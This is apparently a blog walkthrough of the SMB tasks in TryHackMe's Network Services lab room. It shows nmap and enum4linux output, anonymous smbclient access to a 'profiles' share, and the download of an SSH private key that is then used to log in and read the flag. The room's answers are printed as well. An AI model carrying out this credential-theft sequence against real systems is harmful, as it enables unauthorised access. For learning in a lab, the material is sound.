TryHackMeNetworkService
TryHackMeNetworkService

TryHackMe has been awsome platform for learning Hacking/Security from the very basics. In Network Service room we have the usual culprits telnet, smb, ftp. Lets understand and solve the SMB part

Network Service Room Link – https://tryhackme.com/room/networkservices
Task Associated to SMB –
Task 2  Understanding SMB
Task 3  Enumerating SMB
Task 4  Exploiting SMB

Task 3

We would use enum4linux and nmap to do this.

nmap scan on the machine helps in 99% of the times in CTF style challenges so.. [ I have only scanned selective ports instead of -p- , task is scan all to get all open ports

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo nmap -sV -A 10.10.232.67 -p-
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 20:18 EDT
Nmap scan report for 10.10.232.67
Host is up (0.19s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 91:df:5c:7c:26:22:6e:90:23:a7:7d:fa:5c:e1:c2:52 (RSA)
|   256 86:57:f5:2a:f7:86:9c:cf:02:c1:ac:bc:34:90:6b:01 (ECDSA)
|_  256 81:e3:cc:e7:c9:3c:75:d7:fb:e0:86:a0:01:41:77:81 (ED25519)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%), Linux 3.2 - 4.9 (92%), Linux 3.5 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: POLOSMB; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_nbstat: NetBIOS name: POLOSMB, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
|   Computer name: polosmb
|   NetBIOS computer name: POLOSMB\x00
|   Domain name: \x00
|   FQDN: polosmb
|_  System time: 2021-05-20T00:18:22+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-05-20T00:18:22
|_  start_date: N/A

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   190.54 ms 10.8.0.1
2   190.72 ms 10.10.232.67

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.04 seconds
──(abhinav㉿ETHICALHACKX)-[~]
└─$ sudo enum4linux -A 10.10.232.67
[sudo] password for abhinav: 
Unknown option: A
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Wed May 19 19:25:31 2021

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.232.67
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==================================================== 
|    Enumerating Workgroup/Domain on 10.10.232.67    |
 ==================================================== 
[+] Got domain/workgroup name: WORKGROUP

 ============================================ 
|    Nbtstat Information for 10.10.232.67    |
 ============================================ 
Looking up status of 10.10.232.67
	POLOSMB         <00> -         B <ACTIVE>  Workstation Service
	POLOSMB         <03> -         B <ACTIVE>  Messenger Service
	POLOSMB         <20> -         B <ACTIVE>  File Server Service
	..__MSBROWSE__. <01> - <GROUP> B <ACTIVE>  Master Browser
	WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
	WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
	WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

	MAC Address = 00-00-00-00-00-00

 ===================================== 
|    Session Check on 10.10.232.67    |
 ===================================== 
[+] Server 10.10.232.67 allows sessions using username '', password ''

 =========================================== 
|    Getting domain SID for 10.10.232.67    |
 =========================================== 
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup

 ====================================== 
|    OS information on 10.10.232.67    |
 ====================================== 
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.232.67 from smbclient: 
[+] Got OS info for 10.10.232.67 from srvinfo:
	POLOSMB        Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	6.1
	server type     :	0x809a03

 ============================= 
|    Users on 10.10.232.67    |
 ============================= 
Use of uninitialized value $users in print at ./enum4linux.pl line 874.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 877.

Use of uninitialized value $users in print at ./enum4linux.pl line 888.
Use of uninitialized value $users in pattern match (m//) at ./enum4linux.pl line 890.

 ========================================= 
|    Share Enumeration on 10.10.232.67    |
 ========================================= 

	Sharename       Type      Comment
	---------       ----      -------
	netlogon        Disk      Network Logon Service
	profiles        Disk      Users profiles
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (polosmb server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.232.67
//10.10.232.67/netlogon	[E] Can't understand response:
tree connect failed: NT_STATUS_BAD_NETWORK_NAME
//10.10.232.67/profiles	Mapping: OK, Listing: OK
//10.10.232.67/print$	Mapping: DENIED, Listing: N/A
//10.10.232.67/IPC$	[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

 ==================================================== 
|    Password Policy Information for 10.10.232.67    |
 ==================================================== 


[+] Attaching to 10.10.232.67 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

	[+] POLOSMB
	[+] Builtin

[+] Password Info for Domain: POLOSMB

	[+] Minimum password length: 5
	[+] Password history length: None
	[+] Maximum password age: 37 days 6 hours 21 minutes 
	[+] Password Complexity Flags: 000000

		[+] Domain Refuse Password Change: 0
		[+] Domain Password Store Cleartext: 0
		[+] Domain Password Lockout Admins: 0
		[+] Domain Password No Clear Change: 0
		[+] Domain Password No Anon Change: 0
		[+] Domain Password Complex: 0

	[+] Minimum password age: None
	[+] Reset Account Lockout Counter: 30 minutes 
	[+] Locked Account Duration: 30 minutes 
	[+] Account Lockout Threshold: None
	[+] Forced Log off Time: 37 days 6 hours 21 minutes 


[+] Retieved partial password policy with rpcclient:

Password Complexity: Disabled
Minimum Password Length: 5


 ============================== 
|    Groups on 10.10.232.67    |
 ============================== 

[+] Getting builtin groups:

[+] Getting builtin group memberships:

[+] Getting local groups:

[+] Getting local group memberships:

[+] Getting domain groups:

[+] Getting domain group memberships:

 ======================================================================= 
|    Users on 10.10.232.67 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================= 
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-434125608-3964652802-3194254534
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-500 *unknown*\*unknown* (8)
S-1-5-32-501 *unknown*\*unknown* (8)
S-1-5-32-502 *unknown*\*unknown* (8)
S-1-5-32-503 *unknown*\*unknown* (8)
..
..
S-1-5-32-543 *unknown*\*unknown* (8)
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
S-1-5-32-1000 *unknown*\*unknown* (8)
S-1-5-32-1001 *unknown*\*unknown* (8)
S-1-5-32-1002 *unknown*\*unknown* (8)
..
..
S-1-5-32-1040 *unknown*\*unknown* (8)
S-1-5-32-1041 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-5-21-434125608-3964652802-3194254534 and logon username '', password ''
S-1-5-21-434125608-3964652802-3194254534-514 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-515 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-516 *unknown*\*unknown* (8)
..
..
S-1-5-21-434125608-3964652802-3194254534-550 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-1000 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-1001 *unknown*\*unknown* (8)
S-1-5-21-434125608-3964652802-3194254534-1002 *unknown*\*unknown* (8)
..
..
S-1-5-21-434125608-3964652802-3194254534-1046 *unknown*\*unknown* (8)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''


 ============================================= 
|    Getting printer info for 10.10.232.67    |
 ============================================= 
No printers returned.


enum4linux complete on Wed May 19 19:43:45 2021

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ 

Conduct an nmap scan of your choosing, How many ports are open?
From the above results we can observe we have 3 ports open – 22,139,445

What ports is SMB running on?
139/445 nmap says that out loud

Let’s get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name? 
WORKGROUP from enum4linux

What comes up as the name of the machine?   
POLOSMB from enum4linux

What operating system version is running?    
6.1 Under OS Information in enum4linux

What share sticks out as something we might want to investigate? 
profiles from the result of enum4linux under sharename

┌──(abhinav㉿ETHICALHACKX)-[~]
└─$ smbclient //10.10.232.67/profiles -U Anonymous
Enter WORKGROUP\Anonymous's password: 
Try "help" to get a list of possible commands.
smb: \> get "Working From Home Information.txt"
getting file \Working From Home Information.txt of size 358 as Working From Home Information.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> help
?              allinfo        altname        archive        backup         
blocksize      cancel         case_sensitive cd             chmod          
chown          close          del            deltree        dir            
du             echo           exit           get            getfacl        
geteas         hardlink       help           history        iosize         
lcd            link           lock           lowercase      ls             
l              mask           md             mget           mkdir          
more           mput           newer          notify         open           
posix          posix_encrypt  posix_open     posix_mkdir    posix_rmdir    
posix_unlink   posix_whoami   print          prompt         put            
pwd            q              queue          quit           readlink       
rd             recurse        reget          rename         reput          
rm             rmdir          showacls       setea          setmode        
scopy          stat           symlink        tar            tarmode        
timeout        translate      unlock         volume         vuid           
wdel           logon          listconnect    showconnect    tcon           
tdis           tid            utimes         logoff         ..             
!              

smb: \> ls
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 06:49:56 2020
  .cache                             DH        0  Tue Apr 21 07:08:23 2020
  .profile                            H      807  Tue Apr 21 07:08:23 2020
  .sudo_as_admin_successful           H        0  Tue Apr 21 07:08:23 2020
  .bash_logout                        H      220  Tue Apr 21 07:08:23 2020
  .viminfo                            H      947  Tue Apr 21 07:08:23 2020
  Working From Home Information.txt      N      358  Tue Apr 21 07:08:23 2020
  .ssh                               DH        0  Tue Apr 21 07:08:23 2020
  .bashrc                             H     3771  Tue Apr 21 07:08:23 2020
  .gnupg                             DH        0  Tue Apr 21 07:08:23 2020

		12316808 blocks of size 1024. 7584016 blocks available
smb: \> cd .ssh
smb: \.ssh\> ls
  .                                   D        0  Tue Apr 21 07:08:23 2020
  ..                                  D        0  Tue Apr 21 07:08:23 2020
  id_rsa                              A     1679  Tue Apr 21 07:08:23 2020
  id_rsa.pub                          N      396  Tue Apr 21 07:08:23 2020
  authorized_keys                     N        0  Tue Apr 21 07:08:23 2020

		12316808 blocks of size 1024. 7584016 blocks available
smb: \.ssh\> tar c thmNetwork.tar
NT_STATUS_ACCESS_DENIED opening remote file \.ssh\authorized_keys
tar: dumped 2 files and 0 directories
Total bytes written: 2075 (0.0 MiB/s)
smb: \.ssh\> 
──(abhinav㉿ETHICALHACKX)-[~/thm]
└─$ cat 'Working From Home Information.txt' 
John Cactus,

As you're well aware, due to the current pandemic most of POLO inc. has insisted
 that, wherever 
possible, employees should work from home. As such- your account has now been enabled
 with ssh
access to the main server.

If there are any problems, please contact the IT department at it@polointernalcoms.uk

Regards,

James
Department Manager 



──(abhinav㉿ETHICALHACKX)-[~/thm]
└─$ ls
 thmNetwork.tar  'Working From Home Information.txt'
┌──(abhinav㉿ETHICALHACKX)-[~/thm]
└─$ tar -xvf thmNetwork.tar 
./.ssh/id_rsa
./.ssh/id_rsa.pub


┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ chmod 600 id_rsa
┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ ls -la
total 16
drwxr-xr-x 2 abhinav abhinav 4096 May 19 20:59 .
drwxr-xr-x 3 abhinav abhinav 4096 May 19 20:59 ..
-rw------- 1 abhinav abhinav 1679 Apr 21  2020 id_rsa
-rw-r--r-- 1 abhinav abhinav  396 Apr 21  2020 id_rsa.pub


──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ cat id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDb7OaL8zLZ5Z8OU3wZPSIQHaoyI8Yc3I/8/Y6faWgYTZbfNPexli
0jxdAeTeGy2X3XACWcB4HFejbiNsMYLjy517gwWKPBvN865i8uIQ0Gqayq/KmBHpuBbR0yX/SpyfyvzR3V
D16pg/D+WT8hLaNHSYm6FNYLsmVnWDSJDBhS179czftuoW55mw/OqzWVr5ln9cKeeuXlNV1lqCjBqF3C
lzEBvN4JW8GS/riLTeHcXeMIMUTuIpr4XovN/VivIlLqTYy7lHuUh6L2RqAfw5+FSr4QZW1zHCMoS6
FooTomq/03EGJCGcp80/fT0e04n+7+PxnmvZQkOwe1A1hUG6C/ cactus@polosmb


┌──(abhinav㉿ETHICALHACKX)-[~/thm/.ssh]
└─$ ssh -i id_rsa cactus@10.10.232.67
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-96-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Thu May 20 01:14:01 UTC 2021

  System load:  0.0                Processes:           94
  Usage of /:   33.3% of 11.75GB   Users logged in:     0
  Memory usage: 17%                IP address for eth0: 10.10.232.67
  Swap usage:   0%


22 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 21 11:19:15 2020 from 192.168.1.110
cactus@polosmb:~$ ls -l
total 4
-rw-r--r-- 1 root root 20 Apr 21  2020 smb.txt
cactus@polosmb:~$ cat smb.txt 
THM{smb_is_fun_eh?}
cactus@polosmb:~$ 

Task 4

Okay So we got in there, via smbclient,
we got the files required either by -c or zipping the ssh keys,
and on local host we can view id_rsa.pub to see the ssh username is cactus. at the end of file cactus@YOUR_MACHINE_IP
and we login using ssh -i id_rsa cactus@Machine_IP
next we ls to see a file smb.txt which we cat smb.txt to get the flag

What would be the correct syntax to access an SMB share called “secret” as user “suit” on a machine with the IP 10.10.10.2 on the default port?
smbclient //MACHINE_IP/secret -U suit -p 445

Does the share allow anonymous access? Y/N?
Y

Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
John Cactus #from the Work From Home information.txt file

What service has been configured to allow him to work from home?
ssh # from the Work From home Information.txt file

Okay! Now we know this, what directory on the share should we look in?
.ssh #as now we know ssh keys might be present in ~/.ssh

This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
id_rsa #ssh keys are always named this by default

What is the smb.txt flag?
THM{smb_is_fun_eh?} #view the id_rsa.pub to get username and connect by ssh to ls & cat to see the flag

I will update the section on Telnet and FTP soon.

What Do You Think on This ? Say Here